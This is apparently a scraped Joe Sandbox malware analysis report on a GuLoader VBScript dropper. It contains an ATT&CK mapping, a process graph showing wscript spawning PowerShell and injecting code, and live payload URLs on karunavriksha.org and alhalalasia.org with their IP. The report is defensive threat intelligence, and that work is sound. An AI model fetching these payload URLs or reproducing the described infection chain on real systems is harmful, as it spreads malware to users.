      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

      Mitre Att&ck Matrix

      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity Information221
      Scripting      		Valid Accounts1
      Windows Management Instrumentation      		221
      Scripting      		311
      Process Injection      		11
      Masquerading      		OS Credential Dumping11
      Security Software Discovery      		Remote Services1
      Archive Collected Data      		11
      Encrypted Channel      		Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault Accounts2
      Command and Scripting Interpreter      		1
      DLL Side-Loading      		1
      DLL Side-Loading      		31
      Virtualization/Sandbox Evasion      		LSASS Memory1
      Process Discovery      		Remote Desktop ProtocolData from Removable Media1
      Ingress Tool Transfer      		Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain Accounts1
      Exploitation for Client Execution      		Logon Script (Windows)Logon Script (Windows)311
      Process Injection      		Security Account Manager31
      Virtualization/Sandbox Evasion      		SMB/Windows Admin SharesData from Network Shared Drive2
      Non-Application Layer Protocol      		Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal Accounts1
      PowerShell      		Login HookLogin Hook2
      Obfuscated Files or Information      		NTDS1
      Application Window Discovery      		Distributed Component Object ModelInput Capture13
      Application Layer Protocol      		Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      Software Packing      		LSA Secrets1
      Remote System Discovery      		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
      DLL Side-Loading      		Cached Domain Credentials1
      System Network Configuration Discovery      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync1
      File and Directory Discovery      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem23
      System Information Discovery      		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1658919 Sample: Blikvarefabrikken.vbs Startdate: 08/04/2025 Architecture: WINDOWS Score: 100 32 karunavriksha.org 2->32 38 Malicious sample detected (through community Yara rule) 2->38 40 Multi AV Scanner detection for submitted file 2->40 42 Yara detected GuLoader 2->42 44 2 other signatures 2->44 8 wscript.exe 1 2->8         started        11 powershell.exe 16 2->11         started        13 svchost.exe 1 1 2->13         started        signatures3 process4 signatures5 46 VBScript performs obfuscated calls to suspicious functions 8->46 48 Wscript starts Powershell (via cmd or directly) 8->48 50 Windows Scripting host queries suspicious COM object (likely to drop second stage) 8->50 52 Suspicious execution chain found 8->52 15 cmd.exe 1 8->15         started        18 powershell.exe 14 16 8->18         started        54 Early bird code injection technique detected 11->54 56 Writes to foreign memory regions 11->56 58 Found suspicious powershell code related to unpacking or dynamic code loading 11->58 60 Queues an APC in another process (thread injection) 11->60 21 conhost.exe 11->21         started        23 msiexec.exe 11->23         started        process6 dnsIp7 62 Uses ping.exe to check the status of other devices and networks 15->62 25 PING.EXE 1 15->25         started        28 conhost.exe 15->28         started        34 karunavriksha.org 146.88.26.238, 443, 49683 NETMAGIC-APNetmagicDatacenterMumbaiIN India 18->34 64 Found suspicious powershell code related to unpacking or dynamic code loading 18->64 30 conhost.exe 18->30         started        signatures8 process9 dnsIp10 36 127.0.0.1 unknown unknown 25->36

      Screenshots

      Download Video

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      Blikvarefabrikken.vbs8%VirustotalBrowse
      Blikvarefabrikken.vbs6%ReversingLabsScript-WScript.Trojan.GuLoader
      SAMPLE100%Joe Sandbox ML

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      https://karunavriksha.org/ima0%Avira URL Cloudsafe
      http://alhalalasia.org/search/innocence.0%Avira URL Cloudsafe
      https://karunavriksha.org/images/innocence.mso0%Avira URL Cloudsafe
      https://karunavriksha.org/image0%Avira URL Cloudsafe
      http://alhalalasia.org/search0%Avira URL Cloudsafe
      http://alhalalasia.org/search/innocen0%Avira URL Cloudsafe
      http://alhalalasia.org/search/inn0%Avira URL Cloudsafe
      http://alhalalasia.org/search/innocence0%Avira URL Cloudsafe
      https://karunavriksha.org/images/in0%Avira URL Cloudsafe
      http://alhalalasia.or0%Avira URL Cloudsafe
      http://alhalalasia.org/search/innocence.m0%Avira URL Cloudsafe
      https://karunavriksha.org/imag0%Avira URL Cloudsafe
      https://karunavriksha.org/images/0%Avira URL Cloudsafe
      https://karunavriksha.org/images/innocenc0%Avira URL Cloudsafe
      https://karunavriksha.or0%Avira URL Cloudsafe
      http://alhalalasia.org/search/innoce0%Avira URL Cloudsafe
      http://alhalalasia.org/search/innocence.mso0%Avira URL Cloudsafe
      http://alhalalasia.org/searc0%Avira URL Cloudsafe
      https://karunavriksha.org/images/inno0%Avira URL Cloudsafe
      http://alhalalasia.org/sear0%Avira URL Cloudsafe
      https://karunavriksha.org/images0%Avira URL Cloudsafe
      http://alhalalasia.org/se0%Avira URL Cloudsafe
      https://karunavriksha.org/im0%Avira URL Cloudsafe
      http://alhalalasia.org/search/0%Avira URL Cloudsafe
      https://karunavriksha.org/images/innoc0%Avira URL Cloudsafe
      https://karunavriksha.org/images/innocence.msolb0%Avira URL Cloudsafe
      http://alhalalasia.org/search/in0%Avira URL Cloudsafe
      https://karunavriksha.org/images/innocen0%Avira URL Cloudsafe
      http://alhalalasia.org/search/inno0%Avira URL Cloudsafe
      http://karunavriksha.org0%Avira URL Cloudsafe
      https://karunavriksha.org/images/innocence.m0%Avira URL Cloudsafe
      http://alhalalasia.org/search/innocence.msoP0%Avira URL Cloudsafe
      https://karunavriksha.org/images/innocence.ms0%Avira URL Cloudsafe
      https://karunavriksha.org/images/innocence0%Avira URL Cloudsafe
      https://karunavriksha.org/images/i0%Avira URL Cloudsafe
      http://alhalalasia.org/search/innocenc0%Avira URL Cloudsafe
      https://karunavriksha.org/i0%Avira URL Cloudsafe
      http://alhalalasia.org/search/i0%Avira URL Cloudsafe
      https://karunavriksha.org0%Avira URL Cloudsafe
      https://karunavriksha.org/images/innocence.0%Avira URL Cloudsafe
      http://alhalalasia.org0%Avira URL Cloudsafe
      http://alhalalasia.org/search/innocence.ms0%Avira URL Cloudsafe
      http://alhalalasia.org/0%Avira URL Cloudsafe
      https://karunavriksha.org/0%Avira URL Cloudsafe
      http://alhalalasia.org/sea0%Avira URL Cloudsafe
      https://karunavriksha.o0%Avira URL Cloudsafe
      https://karunavriksha.org/images/innoce0%Avira URL Cloudsafe
      http://alhalalasia.o0%Avira URL Cloudsafe
      http://alhalalasia.org/search/innoc0%Avira URL Cloudsafe
      http://alhalalasia.org/s0%Avira URL Cloudsafe
      https://karunavriksha.org/images/inn0%Avira URL Cloudsafe

      Domains and IPs

      Download Network PCAP: filteredfull

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      karunavriksha.org
      		146.88.26.238
      		truefalse
        		unknown

        Contacted URLs

        NameMaliciousAntivirus DetectionReputation
        https://karunavriksha.org/images/innocence.msofalse
        • Avira URL Cloud: safe
        		unknown
        NameSourceMaliciousAntivirus DetectionReputation
        http://alhalalasia.orpowershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        https://karunavriksha.org/images/inpowershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://alhalalasia.org/search/innpowershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://alhalalasia.org/search/innocence.powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        https://karunavriksha.org/imagepowershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://alhalalasia.org/search/innocenpowershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        https://karunavriksha.org/imapowershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        https://contoso.com/Licensepowershell.exe, 00000007.00000002.2098645620.0000000005208000.00000004.00000800.00020000.00000000.sdmpfalse
          		high
          http://alhalalasia.org/searchpowershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://alhalalasia.org/search/innocencepowershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://alhalalasia.org/search/innocence.mpowershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://karunavriksha.org/images/powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://karunavriksha.org/imagpowershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://karunavriksha.org/images/innocencpowershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://alhalalasia.org/search/innocence.msopowershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1117306076.000001AF80229000.00000004.00000800.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://alhalalasia.org/search/innocepowershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://karunavriksha.org/images/innopowershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://contoso.com/powershell.exe, 00000007.00000002.2098645620.0000000005208000.00000004.00000800.00020000.00000000.sdmpfalse
            		high
            https://nuget.org/nuget.exepowershell.exe, 00000004.00000002.1143648343.000001AF90070000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2098645620.0000000005208000.00000004.00000800.00020000.00000000.sdmpfalse
              		high
              https://karunavriksha.orpowershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://alhalalasia.org/searpowershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://alhalalasia.org/searcpowershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://karunavriksha.org/imagespowershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000004.00000002.1117306076.000001AF80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2081602385.00000000041A1000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                http://alhalalasia.org/sepowershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://karunavriksha.org/impowershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://karunavriksha.org/images/innocence.msolbpowershell.exe, 00000004.00000002.1155363014.000001AFFE170000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://alhalalasia.org/search/powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://karunavriksha.org/images/innocpowershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://nuget.org/NuGet.exepowershell.exe, 00000004.00000002.1143648343.000001AF90070000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2098645620.0000000005208000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  http://alhalalasia.org/search/inpowershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000007.00000002.2081602385.00000000042F9000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    https://karunavriksha.org/images/innocenpowershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://alhalalasia.org/search/innopowershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://karunavriksha.orgpowershell.exe, 00000004.00000002.1117306076.000001AF80F8A000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000007.00000002.2081602385.00000000042F9000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      https://karunavriksha.org/images/innocence.mpowershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://alhalalasia.org/search/innocence.msoPpowershell.exe, 00000007.00000002.2081602385.00000000042F9000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://contoso.com/Iconpowershell.exe, 00000007.00000002.2098645620.0000000005208000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://crl.ver)svchost.exe, 00000009.00000002.2339023640.0000019942800000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          https://karunavriksha.org/images/innocencepowershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://karunavriksha.org/images/ipowershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://karunavriksha.org/images/innocence.mspowershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://github.com/Pester/Pesterpowershell.exe, 00000007.00000002.2081602385.00000000042F9000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://alhalalasia.org/search/innocencpowershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://karunavriksha.orgpowershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1117306076.000001AF80229000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://alhalalasia.org/search/ipowershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://karunavriksha.org/ipowershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://aka.ms/pscore6lB;rpowershell.exe, 00000007.00000002.2081602385.00000000041A1000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://karunavriksha.org/images/innocence.powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://g.live.com/odclientsettings/Prod-C:svchost.exe, 00000009.00000003.1203845695.00000199426A3000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://alhalalasia.orgpowershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://g.live.com/odclientsettings/ProdV2-C:svchost.exe, 00000009.00000003.1203845695.0000019942670000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://alhalalasia.org/search/innocence.mspowershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://alhalalasia.org/powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://alhalalasia.opowershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://karunavriksha.org/powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://karunavriksha.opowershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://karunavriksha.org/images/innocepowershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://aka.ms/pscore68powershell.exe, 00000004.00000002.1117306076.000001AF80001000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://alhalalasia.org/search/innocpowershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://alhalalasia.org/spowershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://alhalalasia.org/seapowershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://karunavriksha.org/images/innpowershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown

                                    World Map of Contacted IPs

                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs

                                    Public IPs

                                    IPDomainCountryFlagASNASN NameMalicious
                                    146.88.26.238
                                    		karunavriksha.orgIndia
                                    		17439NETMAGIC-APNetmagicDatacenterMumbaiINfalse

                                    Private

                                    IP
                                    127.0.0.1

                                    General Information

                                    Joe Sandbox version:42.0.0 Malachite
                                    Analysis ID:1658919
                                    Start date and time:2025-04-08 08:11:14 +02:00
                                    Joe Sandbox product:CloudBasic
                                    Overall analysis duration:0h 7m 25s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                    Number of analysed new started processes analysed:19
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Sample name:Blikvarefabrikken.vbs
                                    Detection:MAL
                                    Classification:mal100.troj.expl.evad.winVBS@14/11@1/2
                                    EGA Information:Failed
                                    HCA Information:
                                    • Successful, ratio: 89%
                                    • Number of executed functions: 72
                                    • Number of non-executed functions: 28
                                    Cookbook Comments:
                                    • Found application associated with file extension: .vbs
                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, sppsvc.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                    • Excluded IPs from analysis (whitelisted): 23.204.23.20, 4.245.163.56
                                    • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, e16604.dscf.akamaiedge.net, c.pki.goog, fe3cr.delivery.mp.microsoft.com
                                    • Execution Graph export aborted for target powershell.exe, PID 6456 because it is empty
                                    • Execution Graph export aborted for target powershell.exe, PID 6560 because it is empty
                                    • Not all processes where analyzed, report is missing behavior information
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                    Simulations

                                    Behavior and APIs

                                    TimeTypeDescription
                                    02:12:25API Interceptor88x Sleep call for process: powershell.exe modified
                                    02:12:44API Interceptor2x Sleep call for process: svchost.exe modified

                                    Joe Sandbox View / Context

                                    IPs

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    146.88.26.238#U041a#U043e#U043d#U0442#U0440#U0430#U043a#U0442_#U2116_OX-SOC_150923_FOB.exeGet hashmaliciousGuLoader, RemcosBrowse
                                    • whirlwindprojects.com/donkG148.bin

                                    Domains

                                    No context

                                    ASNs

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    NETMAGIC-APNetmagicDatacenterMumbaiINxd.x86.elfGet hashmaliciousMiraiBrowse
                                    • 203.95.216.170
                                    hgfs.mpsl.elfGet hashmaliciousUnknownBrowse
                                    • 103.25.131.177
                                    http://arayaaspintex.comGet hashmaliciousUnknownBrowse
                                    • 146.88.25.77
                                    https://docs.google.com/presentation/d/e/2PACX-1vRRvWKWO_NaaKl4EhF01H_whQST10fp7Q0VUGzOgS_TF3NkYgjRysFJBvSu4s7PnWAGg2HaymZq30EK/pub?start=false&loop=false&delayms=3000&pli=1&slide=id.pGet hashmaliciousUnknownBrowse
                                    • 164.52.215.14
                                    sora.m68k.elfGet hashmaliciousMiraiBrowse
                                    • 180.179.125.125
                                    kzTq7Bt.exeGet hashmaliciousUnknownBrowse
                                    • 103.235.105.107
                                    Hgf.m68k.elfGet hashmaliciousMiraiBrowse
                                    • 180.179.125.106
                                    x86_64.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                    • 180.179.240.71
                                    F8HYX5HOgA.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                    • 103.120.177.150
                                    tmkSAOF3GM.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                    • 103.120.177.150

                                    JA3 Fingerprints

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    3b5074b1b5d032e5620f69f9f700ff0eCopy of the Invoice.vbsGet hashmaliciousBatch Injector, MSIL Logger, MassLogger RATBrowse
                                    • 146.88.26.238
                                    ACHPaymentAdvice.jsGet hashmaliciousAsyncRATBrowse
                                    • 146.88.26.238
                                    Winlogon.vbsGet hashmaliciousAsyncRATBrowse
                                    • 146.88.26.238
                                    Detailed packing list 25DMPT01.jsGet hashmaliciousUnknownBrowse
                                    • 146.88.26.238
                                    INV-13M250005929.jsGet hashmaliciousAgentTeslaBrowse
                                    • 146.88.26.238
                                    https://cdn.old.server.spacebar.chat/attachments/1359012833967595815/1359012962651607231/ZapytanieGarantisedlers5352522223256736325.zipGet hashmaliciousUnknownBrowse
                                    • 146.88.26.238
                                    HSC NEW LUCKY V01.25 PARTICULARS.xlsx.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                    • 146.88.26.238
                                    SecuriteInfo.com.Win32.PWSX-gen.21545.7289.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                    • 146.88.26.238
                                    KAPAL CANTIK AGENCY APPOINTMENT.pdf.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                    • 146.88.26.238
                                    PO.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                    • 146.88.26.238

                                    Dropped Files

                                    No context

                                    Created / dropped Files

                                    C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                    Download File
                                    Process:C:\Windows\System32\svchost.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):1310720
                                    Entropy (8bit):0.4932203403530737
                                    Encrypted:false
                                    SSDEEP:1536:cJNnm0h6QV70hV40h5RJkS6SNJNJbSMeCXhtvKTeYYJyNtEBRDna33JnbgY1ZtaL:cJhXC9lHmutpJyiRDeJ/aUKrDgnmh
                                    MD5:C449154787A8AC604E5FDFD8ADDF47BA
                                    SHA1:A399744868C4C9905477D862AF102BD1121DBF60
                                    SHA-256:30FDBF7D12AB6C46021A33A9BDFE492C87065C49BEB8EE0CB9761007F4BBBA13
                                    SHA-512:CA7DC2824926B56D926768F238D6FEC500E6A311D7F0307D724D4E613B90CE34E61E2E5FAC0F791807B5BC3BC2BDCDA6345DF2EC55B3DA79A01790BF44BF0340
                                    Malicious:false
                                    Reputation:low
                                    Preview:^.;V........@..@-....{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@...................................&.#.\.#.........`h.................h.......0.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

                                    C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                    Download File
                                    Process:C:\Windows\System32\svchost.exe
                                    File Type:Extensible storage engine DataBase, version 0x620, checksum 0x08141935, page size 16384, DirtyShutdown, Windows version 10.0
                                    Category:dropped
                                    Size (bytes):1310720
                                    Entropy (8bit):0.7217342786784623
                                    Encrypted:false
                                    SSDEEP:1536:jSB2ESB2SSjlK/Tv5m0hnRJjAVtu8Ykr3g16tV2UPkLk+kcBLZiAcZwytuknSDVd:jazaNvFv8V2UW/DLzN/w4wZi
                                    MD5:2696E4EDE50564AD39932BD60A7E6675
                                    SHA1:5101E786EACD07C48D5EA252F6D1EF1D7A1C64B9
                                    SHA-256:44F4EFD3D7453BC1809E9B6490D35BF3C31C39CE38AD208C49B4E21209F4E068
                                    SHA-512:E82F99294E26B5F189B1CA16F81AC47ADB7AB6CF4FE8864BBA3AD9F4F553A7A03C01927977CD64BEB183CB584294FB11A647A664120A5382EBFDC61F52849D2E
                                    Malicious:false
                                    Preview:...5... ...............X\...;...{......................p.D..........{}.,....}..h.F.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... .......-....{...............................................................................................................................................................................................2...{...................................,$,....}.;................vK.4,....}...........................#......h.F.....................................................................................................................................................................................................................................................................................................................................................

                                    C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                    Download File
                                    Process:C:\Windows\System32\svchost.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):16384
                                    Entropy (8bit):0.08099323468159275
                                    Encrypted:false
                                    SSDEEP:3:JGml/llKYe+2iPw/fgsCrZClW/t8xjUitllall+SHY/Xl+/rQLve:sm1KzFiPwfgs3G6lUitlAAS4M
                                    MD5:02817B84F09B9B1CEB4A6F5920A99998
                                    SHA1:8BDDF07F2F855012E9E60F30B472A692126E8996
                                    SHA-256:7DF686C4F5A9E45B99C16C62B89D0128661D1466538AE5A67233FE1221AE0188
